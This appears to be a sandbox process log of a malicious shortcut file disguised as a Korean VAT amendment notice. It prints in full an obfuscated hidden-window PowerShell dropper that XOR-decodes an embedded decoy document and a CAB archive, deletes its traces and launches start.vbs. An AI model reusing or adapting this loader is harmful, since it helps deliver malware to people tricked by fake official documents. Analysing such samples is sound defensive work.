cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iyfsPiQmGGeVn" "C:\Users\test22\AppData\Local\Temp\부가가치세 수정신고 안내(부가가치세사무처리규정).hwp.lnk"
2636cmd.exe "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function hyroGAN{param($gRRXdaln); $SEXiGo=Get''-C\"\"h''ild''I\"\"t\"\"e\"\"m -Path $gRRXdaln -Recurse *.lnk ^| wh\"\"er\"\"e\"\"-o\"\"bje''ct {$_.length -eq 0x03EE569C} ^| Sel''ect''-O\"\"bj\"\"e\"\"ct -ExpandProperty FullName; return $SEXiGo;};function DGTZUkn{param($FjFfNJyV,$NVUYZYa,$uJMIAV,$OPURoQ,$JiOPSEnH); $KhPAKsCs=New\"\"-Ob''jec\"\"t System.IO.FileStream($FjFfNJyV,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read); $KhPAKsCs.Seek($NVUYZYa,[System.IO.SeekOrigin]::Begin); $MlqewZMb=Ne\"\"w\"\"-O''bj\"\"e''ct byte[] $uJMIAV; $KhPAKsCs.Read($MlqewZMb,0,$uJMIAV); $KhPAKsCs.Close();for($PKVgpCbI=0;$PKVgpCbI -lt $uJMIAV;$PKVgpCbI++){$MlqewZMb[$PKVgpCbI]=$MlqewZMb[$PKVgpCbI] -bxor $OPURoQ;}sc $JiOPSEnH $MlqewZMb -Encoding Byte;};$JQCcrJ=Get\"\"-Lo\"\"c\"\"at''io\"\"n;$qurxYiEA=hyroGAN -gRRXdaln $JQCcrJ;if($qurxYiEA.length -eq 0){$qurxYiEA=hyroGAN -gRRXdaln $env:Temp;} $JQCcrJ=S''p\"\"lit\"\"-Pa\"\"t\"\"h $qurxYiEA;$TweLdPR = $qurxYiEA.substring(0,$qurxYiEA.length-4) + '';DGTZUkn -FjFfNJyV $qurxYiEA -NVUYZYa 0x00001C90 -uJMIAV 0x00011A00 -OPURoQ 0x68 -JiOPSEnH $TweLdPR;^& $TweLdPR;$LhwhYhz=$env:public + '\' + 'gRRXda.cab';DGTZUkn -FjFfNJyV $qurxYiEA -NVUYZYa 0x00013690 -uJMIAV 0x00013CD2 -OPURoQ 0x03 -JiOPSEnH $LhwhYhz;Rem\"\"ov''e''-I''t''em -Path $qurxYiEA -Force;expand $LhwhYhz -F:* ($env:public + '\' + 'documents');re\"\"mo''ve-\"\"i\"\"te\"\"m -path $LhwhYhz -force;$jHoteEl=$env:public+'\documents\start.vbs';^& $jHoteEl;
2764powershell.exe powershell -windowstyle hidden function hyroGAN{param($gRRXdaln); $SEXiGo=Get''-C\"\"h''ild''I\"\"t\"\"e\"\"m -Path $gRRXdaln -Recurse *.lnk | wh\"\"er\"\"e\"\"-o\"\"bje''ct {$_.length -eq 0x03EE569C} | Sel''ect''-O\"\"bj\"\"e\"\"ct -ExpandProperty FullName; return $SEXiGo;};function DGTZUkn{param($FjFfNJyV,$NVUYZYa,$uJMIAV,$OPURoQ,$JiOPSEnH); $KhPAKsCs=New\"\"-Ob''jec\"\"t System.IO.FileStream($FjFfNJyV,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read); $KhPAKsCs.Seek($NVUYZYa,[System.IO.SeekOrigin]::Begin); $MlqewZMb=Ne\"\"w\"\"-O''bj\"\"e''ct byte[] $uJMIAV; $KhPAKsCs.Read($MlqewZMb,0,$uJMIAV); $KhPAKsCs.Close();for($PKVgpCbI=0;$PKVgpCbI -lt $uJMIAV;$PKVgpCbI++){$MlqewZMb[$PKVgpCbI]=$MlqewZMb[$PKVgpCbI] -bxor $OPURoQ;}sc $JiOPSEnH $MlqewZMb -Encoding Byte;};$JQCcrJ=Get\"\"-Lo\"\"c\"\"at''io\"\"n;$qurxYiEA=hyroGAN -gRRXdaln $JQCcrJ;if($qurxYiEA.length -eq 0){$qurxYiEA=hyroGAN -gRRXdaln $env:Temp;} $JQCcrJ=S''p\"\"lit\"\"-Pa\"\"t\"\"h $qurxYiEA;$TweLdPR = $qurxYiEA.substring(0,$qurxYiEA.length-4) + '';DGTZUkn -FjFfNJyV $qurxYiEA -NVUYZYa 0x00001C90 -uJMIAV 0x00011A00 -OPURoQ 0x68 -JiOPSEnH $TweLdPR;& $TweLdPR;$LhwhYhz=$env:public + '\' + 'gRRXda.cab';DGTZUkn -FjFfNJyV $qurxYiEA -NVUYZYa 0x00013690 -uJMIAV 0x00013CD2 -OPURoQ 0x03 -JiOPSEnH $LhwhYhz;Rem\"\"ov''e''-I''t''em -Path $qurxYiEA -Force;expand $LhwhYhz -F:* ($env:public + '\' + 'documents');re\"\"mo''ve-\"\"i\"\"te\"\"m -path $LhwhYhz -force;$jHoteEl=$env:public+'\documents\start.vbs';& $jHoteEl;
2872Hwp.exe "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\부가가치세 수정신고 안내(부가가치세사무처리규정).hwp"
2976HimTrayIcon.exe "C:\Program Files (x86)\Hnc\Common80\HimTrayIcon.exe"
2108expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\gRRXda.cab -F:* C:\Users\Public\documents
3040wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\documents\start.vbs"
940explorer.exe C:\Windows\Explorer.EXE
1452